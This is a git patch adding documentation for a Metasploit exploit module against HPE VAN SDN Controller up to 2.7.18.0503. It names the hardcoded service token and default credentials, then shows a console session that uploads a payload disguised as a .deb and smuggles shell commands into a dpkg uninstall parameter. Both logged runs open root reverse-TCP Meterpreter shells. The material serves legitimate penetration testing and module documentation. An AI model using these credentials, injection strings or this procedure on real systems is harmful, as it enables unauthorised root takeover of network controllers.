From 12a0aaeaf121ceee28b1bce06ccd196e30fcecfe Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 3 Jul 2018 18:31:43 -0500 Subject: [PATCH] Add module doc --- .../exploit/linux/http/hp_van_sdn_token.md | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/hp_van_sdn_token.md diff --git a/documentation/modules/exploit/linux/http/hp_van_sdn_token.md b/documentation/modules/exploit/linux/http/hp_van_sdn_token.md new file mode 100644 index 0000000000..40b1195ced --- /dev/null +++ b/documentation/modules/exploit/linux/http/hp_van_sdn_token.md @@ -0,0 +1,85 @@ +## Intro + +This module exploits a hardcoded service token or default credentials in +HPE VAN SDN Controller <= 2.7.18.0503 to execute a payload as root. + +A root command injection was discovered in the uninstall action's name +parameter, obviating the need to use sudo for privilege escalation. + +If the service token option `TOKEN` is blank, `USERNAME` and `PASSWORD` +will be used for authentication. An additional login request will be +sent. + +## Setup + +Follow . + +Tested on 2.7.18.0503. + +## Options + +**TOKEN** + +Set this to the service token. Defaults to `AuroraSdnToken37`. + +**USERNAME** + +Set this to the service username. Defaults to `sdn`. + +**PASSWORD** + +Set this to the service password. Defaults to `skyline`. + +## Usage + +``` +msf5 > use exploit/linux/http/hp_van_sdn_token +msf5 exploit(linux/http/hp_van_sdn_token) > set rhosts 192.168.56.102 +rhosts => 192.168.56.102 +msf5 exploit(linux/http/hp_van_sdn_token) > set target Linux Dropper +target => Linux Dropper +msf5 exploit(linux/http/hp_van_sdn_token) > set payload linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +msf5 exploit(linux/http/hp_van_sdn_token) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf5 exploit(linux/http/hp_van_sdn_token) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Authenticating with service token AuroraSdnToken37 +[*] Uploading payload as fake .deb +[+] Uploaded /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb +[*] Renaming payload and executing it +[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1.deb${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1 +[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1 +[*] Sending stage (812100 bytes) to 192.168.56.102 +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:34468) at 2018-07-03 18:23:08 -0500 +[+] Deleted /var/lib/sdn/uploads/PZNmbCCF6BYIL3Zv1 + +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +meterpreter > sysinfo +Computer : 192.168.56.102 +OS : Debian 8 (Linux 4.4.0-2-amd64-hlinux) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +Background session 1? [y/N] +msf5 exploit(linux/http/hp_van_sdn_token) > set token "" +token => +msf5 exploit(linux/http/hp_van_sdn_token) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Authenticating with creds sdn:skyline +[+] Logged in with auth token 26d7b53a73a9455eae63c346321bfe31 +[*] Uploading payload as fake .deb +[+] Uploaded /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb +[*] Renaming payload and executing it +[*] Injecting dpkg -r --pre-invoke=mv${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l.deb${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l${IFS}&&${IFS}chmod${IFS}+x${IFS}/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l +[*] Injecting dpkg -r --pre-invoke=/var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l +[*] Sending stage (812100 bytes) to 192.168.56.102 +[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:34474) at 2018-07-03 18:24:47 -0500 +[+] Deleted /var/lib/sdn/uploads/kZzvx9DHtqQ39RPKuc0rVKzafsm584bye0l + +meterpreter > +```